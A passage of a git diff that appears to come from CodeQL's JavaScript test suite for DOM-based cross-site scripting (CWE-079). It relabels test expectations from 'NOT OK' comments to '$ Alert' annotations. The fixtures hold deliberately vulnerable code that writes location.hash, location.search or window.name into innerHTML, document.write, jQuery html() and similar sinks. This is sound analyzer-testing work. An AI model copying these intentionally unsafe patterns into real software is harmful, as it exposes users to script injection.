${DateTime.now().plus({years: 1}).toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // $ Alert } function dateio2() { let taint = decodeURIComponent(window.location.hash.substring(1)); const moment = new MomentAdapter(); - document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert const luxon = new LuxonAdapter(); - document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // $ Alert const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 487e51c8f8ad..1d43afdefa91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -12,7 +12,7 @@ function drop(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function drop(e) { export function install(el: HTMLElement): void { el.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }) } document.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }); $("#foo").bind('drop', (e) => { - $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('drop', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js index a48f720bed1a..152a986bbf6e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js @@ -1,4 +1,4 @@ function test() { let loc = window.location.href; - $('click'); // OK + $('click'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js index 5b79cfce8993..8eebe40b4179 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js @@ -1,3 +1,3 @@ document.getElementById('my-id').onclick = function() { - this.parentNode.innerHTML = '

A link

'; // NOT OK + this.parentNode.innerHTML = '

A link

'; // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js index cab534d3832c..2d1af9065d35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js @@ -3,9 +3,8 @@ var app = express(); import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - // NOT OK - new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); + new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); // $ Alert + - // OK new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index 3369df5dd873..f81f545809fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -2,37 +2,37 @@ function test() { var tainted = document.location.search $(tainted); // OK - location.search starts with '?' - $("body", tainted); // OK - $("." + tainted); // OK - $("
"); // NOT OK - $("body").html("XSS: " + tainted); // NOT OK + $("body", tainted); + $("." + tainted); + $("
"); // $ Alert + $("body").html("XSS: " + tainted); // $ Alert $(window.location.hash); // OK - location.hash starts with '#' - $("" + location.toString() + ""); // NOT OK + $("" + location.toString() + ""); // $ Alert // Not related to jQuery, but the handling of $() should not affect this sink let elm = document.getElementById('x'); - elm.innerHTML = decodeURIComponent(window.location.hash); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.search); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.toString()); // NOT OK + elm.innerHTML = decodeURIComponent(window.location.hash); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert let hash = window.location.hash; $(hash); // OK - start with '#' - $(hash.substring(1)); // NOT OK - $(hash.substring(1, 10)); // NOT OK - $(hash.substr(1)); // NOT OK - $(hash.slice(1)); // NOT OK - $(hash.substring(0, 10)); // OK + $(hash.substring(1)); // $ Alert + $(hash.substring(1, 10)); // $ Alert + $(hash.substr(1)); // $ Alert + $(hash.slice(1)); // $ Alert + $(hash.substring(0, 10)); - $(hash.replace('#', '')); // NOT OK - $(window.location.search.replace('?', '')); // NOT OK - $(hash.replace('!', '')); // OK - $(hash.replace('blah', '')); // OK + $(hash.replace('#', '')); // $ Alert + $(window.location.search.replace('?', '')); // $ Alert + $(hash.replace('!', '')); + $(hash.replace('blah', '')); - $(hash + 'blah'); // OK + $(hash + 'blah'); $('blah' + hash); // OK - does not start with '<' - $('' + hash + ''); // NOT OK + $('' + hash + ''); // $ Alert - $('#foo').replaceWith(tainted); // NOT OK - $('#foo').replaceWith(() => tainted); // NOT OK + $('#foo').replaceWith(tainted); // $ Alert + $('#foo').replaceWith(() => tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index 85ad5cef8d43..f9958ea20999 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -28,15 +28,15 @@ app.get("/some/path", function (req, res) { }; // OK + }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 08183d0db7e3..74c96fdae902 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -7,7 +7,6 @@ app.get('/some/path', function (req, res) { var taint = req.param("wobble"); jwt.verify(taint, 'my-secret-key', function (err, decoded) { - // NOT OK - new JSDOM(decoded.foo, { runScripts: "dangerously" }); + new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js index 7ead302724c3..59e96cb9d11e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js @@ -3,5 +3,5 @@ import $ from "jquery" $.post(loginUrl(), {data: "foo"}, (data, xhr) => { var decoded = jwt_decode(data); - $.jGrowl(decoded); // NOT OK - but only flagged with additional sources [INCONSISTENCY] + $.jGrowl(decoded); // $ MISSING: Alert - only flagged with additional sources }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js index 9091f93be7bb..f1fceadbf057 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js @@ -9,7 +9,7 @@ app.post('/private_message', (req, res) => { from: 'webmaster@example.com', to: backend.getUserEmail(req.query.receiver), subject: 'Private message', - text: `Hi, you got a message from someone. ${req.query.message}.`, // OK - html: `Hi, you got a message from someone. ${req.query.message}.`, // NOT OK + text: `Hi, you got a message from someone. ${req.query.message}.`, + html: `Hi, you got a message from someone. ${req.query.message}.`, // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index e8139936bc78..dcec3e388777 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,24 +1,24 @@ function test() { var target = document.location.search - $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); // OK + $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert var tainted = target; - $('myId').html(tainted); // NOT OK + $('myId').html(tainted); // $ Alert if (sanitize) { tainted = DOMPurify.sanitize(tainted); } - $('myId').html(tainted); // OK + $('myId').html(tainted); inner(target); function inner(x) { - $('myId').html(x); // NOT OK + $('myId').html(x); // $ Alert if (sanitize) { x = DOMPurify.sanitize(x); } - $('myId').html(x); // OK + $('myId').html(x); } } @@ -29,18 +29,18 @@ function badSanitizer() { return x; // No sanitization; } var tainted2 = target; - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert if (sanitize) { tainted2 = sanitizeBad(tainted2); } - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert var tainted3 = target; - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert if (sanitize) { tainted3 = sanitizeBad(tainted3); } - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert - $('myId').html(sanitize ? sanitizeBad(target) : target); // NOT OK + $('myId').html(sanitize ? sanitizeBad(target) : target); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index 66b7d65f669b..b60ca27e0e47 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -7,13 +7,13 @@ export default function Post(params) { return ( <>
) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 318007dacfa0..2e403f76ddae 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -5,6 +5,6 @@ var app = express(); app.get('/some/path', function(req, res) { let tainted = req.param("code"); - ; // NOT OK - ; // NOT OK + ; // $ Alert + ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js index 6d7e20ec6eb8..3811c6b2c964 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js @@ -7,13 +7,13 @@ function useMyContext() { export function useDoc1() { let { root } = useMyContext(); - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } class C extends Component { foo() { let { root } = this.context; - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js index 49d66634e5af..472f2026f1db 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js @@ -5,13 +5,13 @@ export function nextRouter() { return (
{ - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1 { - router.replace(router.query.foobar) // NOT OK + router.replace(router.query.foobar) // $ Alert }}>Click to XSS 2 { - router.push('/?foobar=' + router.query.foobar) // OK + router.push('/?foobar=' + router.query.foobar) }}>Safe Link
) @@ -20,7 +20,7 @@ export function nextRouter() { import { withRouter } from 'next/router' function Page({ router }) { - return router.push(router.query.foobar)}>Click to XSS 3 // NOT OK + return router.push(router.query.foobar)}>Click to XSS 3 // $ Alert } export const pageWithRouter = withRouter(Page); @@ -30,7 +30,7 @@ export function nextRouterWithLib() { return (
{ - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1
) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 672cd3bd6898..7bf77b18be10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -2,25 +2,25 @@ import { useState } from 'react'; function initialState() { let [state, setState] = useState(window.name); - return
; // NOT OK + return
; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); setState(window.name); - return
; // NOT OK + return
; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(() => window.name); - return
; // NOT OK + return
; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(prev => { - document.body.innerHTML = prev; // NOT OK + document.body.innerHTML = prev; // $ Alert }) setState(() => window.name); } @@ -29,5 +29,5 @@ function setStateValueSafe() { let [state, setState] = useState('foo'); setState('safe'); setState(() => 'also safe'); - return
; // OK + return
; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 9d9fe6c80c97..3ece85044bb3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -15,35 +15,35 @@ function escapeAttr(s) { function test() { var tainted = window.name; var elt = document.createElement(); - elt.innerHTML = "" + escapeHtml(tainted) + ""; // OK - elt.innerHTML = "
" + escapeAttr(tainted) + "
"; // NOT OK, but not flagged - [INCONSISTENCY] + elt.innerHTML = "" + escapeHtml(tainted) + ""; + elt.innerHTML = "
" + escapeAttr(tainted) + "
"; // $ MISSING: Alert - not flagged - const regex = /[<>'"&]/; if (regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (!regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } if (regex.exec(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) != null) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) == null) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } - elt.innerHTML = tainted.replace(/<\w+/g, ''); // NOT OK + elt.innerHTML = tainted.replace(/<\w+/g, ''); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6c13ae8cc3e2..6ee44babf8bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -2,29 +2,29 @@ sessionStorage.setItem('session', document.location.search); localStorage.setItem('local', document.location.search); - $('myId').html(sessionStorage.getItem('session')); // NOT OK - $('myId').html(localStorage.getItem('session')); // OK - $('myId').html(sessionStorage.getItem('local')); // OK - $('myId').html(localStorage.getItem('local')); // NOT OK + $('myId').html(sessionStorage.getItem('session')); // $ Alert + $('myId').html(localStorage.getItem('session')); + $('myId').html(sessionStorage.getItem('local')); + $('myId').html(localStorage.getItem('local')); // $ Alert var href = localStorage.getItem('local'); - $('myId').html("foobar"); // NOT OK + $('myId').html("foobar"); // $ Alert if (href.indexOf("\"") !== -1) { return; } - $('myId').html(""); // OK + $('myId').html(""); var href2 = localStorage.getItem('local'); if (href2.indexOf("\"") !== -1) { return; } - $('myId').html("\nfoobar"); // OK + $('myId').html("\nfoobar"); var href3 = localStorage.getItem('local'); if (href3.indexOf("\"") !== -1) { return; } - $('myId').html('\r\n' + "something" + ''); // OK + $('myId').html('\r\n' + "something" + ''); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js index 91e122dee0f5..d20f88dba398 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js @@ -1,12 +1,12 @@ -document.write(document.location.href.charCodeAt(0)); // OK +document.write(document.location.href.charCodeAt(0)); -document.write(document.location); // NOT OK -document.write(document.location.href); // NOT OK -document.write(document.location.href.valueOf()); // NOT OK -document.write(document.location.href.sup()); // NOT OK -document.write(document.location.href.toUpperCase()); // NOT OK -document.write(document.location.href.trimLeft()); // NOT OK -document.write(String.fromCharCode(document.location.href)); // NOT OK -document.write(String(document.location.href)); // NOT OK -document.write(escape(document.location.href)); // OK (for now) -document.write(escape(escape(escape(document.location.href)))); // OK (for now) +document.write(document.location); // $ Alert +document.write(document.location.href); // $ Alert +document.write(document.location.href.valueOf()); // $ Alert +document.write(document.location.href.sup()); // $ Alert +document.write(document.location.href.toUpperCase()); // $ Alert +document.write(document.location.href.trimLeft()); // $ Alert +document.write(String.fromCharCode(document.location.href)); // $ Alert +document.write(String(document.location.href)); // $ Alert +document.write(escape(document.location.href)); // OK - for now +document.write(escape(escape(escape(document.location.href)))); // OK - for now diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a1feef0267a0..a823a6ce004f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -2,9 +2,9 @@ import 'dummy'; function foo(x, y, z) { arguments; // ensure 'arguments' are used - document.writeln(x); // OK - document.writeln(y); // NOT OK - document.writeln(z); // OK + document.writeln(x); + document.writeln(y); // $ Alert + document.writeln(z); } function bar() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index d030b30b1390..e1d26b45802d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -5,17 +5,17 @@ import ReactTooltip from 'react-tooltip'; function tooltips() { const source = window.name; return - // OK - // OK - // NOT OK - // NOT OK + + + // $ Alert + // $ Alert } function MyElement(props) { const provide = props.provide; - return
; // NOT OK + return
; // $ Alert } function useMyElement() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index 43ab0a02cf27..d57844a89f28 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -5,8 +5,7 @@ }; var target = document.location.search var searchParams = new URLSearchParams(target.substring(1)); - // NOT OK - $('original-term').html(searchParams.get('term')); - // OK + $('original-term').html(searchParams.get('term')); // $ Alert + $('translated-term').html(translate[searchParams.get('term')]); })(); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 7702768d6039..34eae2dc6a5b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,12 +1,12 @@ import * as lib from './trusted-types-lib'; -const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // NOT OK +const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert policy1.createHTML(window.name); -const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); // OK +const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); -const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK +const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index fea2063a4e3a..760edfa9ec8a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,144 +1,128 @@ function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert - // NOT OK - document.write(""); + document.write(""); // $ Alert document.write(""); - // NOT OK - $('
'); + $('
'); // $ Alert - $('
'); // OK - $('
'); // OK + $('
'); + $('
'); let params = (new URL(document.location)).searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); - $('name').html(searchParams.get('name')); // NOT OK + $('name').html(searchParams.get('name')); // $ Alert } function foo(target) { - // NOT OK - $('myId').html(target); + $('myId').html(target); // $ Alert } foo(document.location.search); function bar() { return document.location.search; } -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert function baz(x) { return x; } -// NOT OK -$('myId').html(baz(document.location.search)); +$('myId').html(baz(document.location.search)); // $ Alert function wrap(s) { return "
" + s + "
"; } -// NOT OK -$('myId').html(wrap(document.location.search)); +$('myId').html(wrap(document.location.search)); // $ Alert function chop(s) { if (s) return s.substr(1); return ""; } -// NOT OK -$('myId').html(chop(document.location.search)); -// NOT OK (duplicated to test precision of flow tracking) -$('myId').html(chop(document.location.search)); -// NOT OK -$('myId').html(wrap(chop(bar()))); +$('myId').html(chop(document.location.search)); // $ Alert +$('myId').html(chop(document.location.search)); // $ Alert - duplicated to test precision of flow tracking +$('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { - // NOT OK - $('myId').html(s); + $('myId').html(s); // $ Alert } dangerouslySetInnerHtml(document.location.search); dangerouslySetInnerHtml(document.location.search); -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert [,document.location.search].forEach(function(x) { if (x) - // NOT OK - $('myId').html(x); + $('myId').html(x); // $ Alert }); -// NOT OK -let s = ; +let s = ; // $ Alert angular.module('myApp', []) .service("myService", function($sce, $other) { - $sce.trustAsHtml(document.location.search); // NOT OK - $sce.trustAsCss(document.location.search); // NOT OK - $sce.trustAsUNKNOWN(document.location.search); // OK - $sce.trustAs($sce.HTML, document.location.search); // NOT OK - $sce.trustAs($sce.CSS, document.location.search); // NOT OK - $sce.trustAs(UNKNOWN, document.location.search); // OK - $other.trustAsHtml(document.location.search); // OK + $sce.trustAsHtml(document.location.search); // $ Alert + $sce.trustAsCss(document.location.search); // $ Alert + $sce.trustAsUNKNOWN(document.location.search); + $sce.trustAs($sce.HTML, document.location.search); // $ Alert + $sce.trustAs($sce.CSS, document.location.search); // $ Alert + $sce.trustAs(UNKNOWN, document.location.search); + $other.trustAsHtml(document.location.search); }) .service("myService2", function() { - angular.element('
').html(document.location.search); // NOT OK - angular.element('
').html('SAFE'); // OK + angular.element('
').html(document.location.search); // $ Alert + angular.element('
').html('SAFE'); }) .directive('myCustomer', function() { return { link: function(scope, element){ - element.html(document.location.search); // NOT OK - element.html('SAFE'); // OK + element.html(document.location.search); // $ Alert + element.html('SAFE'); } }; }) .service("myService3", function() { - angular.element(document.location.search); // NOT OK - angular.element('SAFE'); // OK + angular.element(document.location.search); // $ Alert + angular.element('SAFE'); }) function tst() { var v = document.location.search.substr(1); - // NOT OK - document.write(v); + document.write(v); // $ Alert if (/^\d+$/.test(v)) { - // OK + document.write(v); } if ((m = /^\d+$/.exec(v))) { - // OK + document.write(v); } if (v.match(/^\d+$/)) { - // OK + document.write(v); } if (v.match("^\\d+$")) { - // OK + document.write(v); } if (!(/\d+/.test(v))) // not effective - matches "123" return; - // NOT OK - document.write(v); + document.write(v); // $ Alert if (!(/^\d+$/.test(v))) return; - // OK + document.write(v); } @@ -148,11 +132,11 @@ function angularJSServices() { xssSinkService1(window.location.search); }]) .factory("xssSinkService1", function(){ - return function(v){ $("
").html(v); } // NOT OK + return function(v){ $("
").html(v); } // $ Alert }) .factory("xssSource_from_service", ["xssSourceService", function(xssSourceService){ - $("
").html(xssSourceService()); // NOT OK + $("
").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ return function() { return window.location.search }; @@ -162,11 +146,11 @@ function angularJSServices() { xssSinkService2("innocent"); }]) .factory("xssSinkService2", function(){ - return function(v){ $("
").html(v); } // OK + return function(v){ $("
").html(v); } }) .factory("innocentSource_from_service", ["innocentSourceService", function(innocentSourceService){ - $("
").html(innocentSourceService()); // OK + $("
").html(innocentSourceService()); }]) .factory("innocentSourceService", function(){ return function() { return "innocent" }; @@ -177,27 +161,27 @@ function testDOMParser() { var target = document.location.search var parser = new DOMParser(); - parser.parseFromString(target, "application/xml"); // NOT OK + parser.parseFromString(target, "application/xml"); // $ Alert } function references() { var tainted = document.location.search; - document.body.innerHTML = tainted; // NOT OK + document.body.innerHTML = tainted; // $ Alert - document.createElement().innerHTML = tainted; // NOT OK - createElement().innerHTML = tainted; // NOT OK + document.createElement().innerHTML = tainted; // $ Alert + createElement().innerHTML = tainted; // $ Alert - document.getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName().item().innerHTML = tainted; // NOT OK + document.getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName().item().innerHTML = tainted; // $ Alert } function react(){ var tainted = document.location.search; - React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK - React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK + React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert + React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert class C1 extends React.Component { constructor() { @@ -209,26 +193,26 @@ function react(){ } test() { - $('myId').html(this.state.tainted1); // NOT OK - $('myId').html(this.state.tainted2); // NOT OK - $('myId').html(this.state.tainted3); // NOT OK - $('myId').html(this.state.notTainted); // OK + $('myId').html(this.state.tainted1); // $ Alert + $('myId').html(this.state.tainted2); // $ Alert + $('myId').html(this.state.tainted3); // $ Alert + $('myId').html(this.state.notTainted); this.setState(prevState => { - $('myId').html(prevState.tainted4) // NOT OK + $('myId').html(prevState.tainted4) // $ Alert }); } } class C2 extends React.Component { test() { - $('myId').html(this.props.tainted1); // NOT OK - $('myId').html(this.props.tainted2); // NOT OK - $('myId').html(this.props.tainted3); // NOT OK - $('myId').html(this.props.notTainted); // OK + $('myId').html(this.props.tainted1); // $ Alert + $('myId').html(this.props.tainted2); // $ Alert + $('myId').html(this.props.tainted3); // $ Alert + $('myId').html(this.props.notTainted); this.setState((prevState, prevProps) => { - $('myId').html(prevProps.tainted4) // NOT OK + 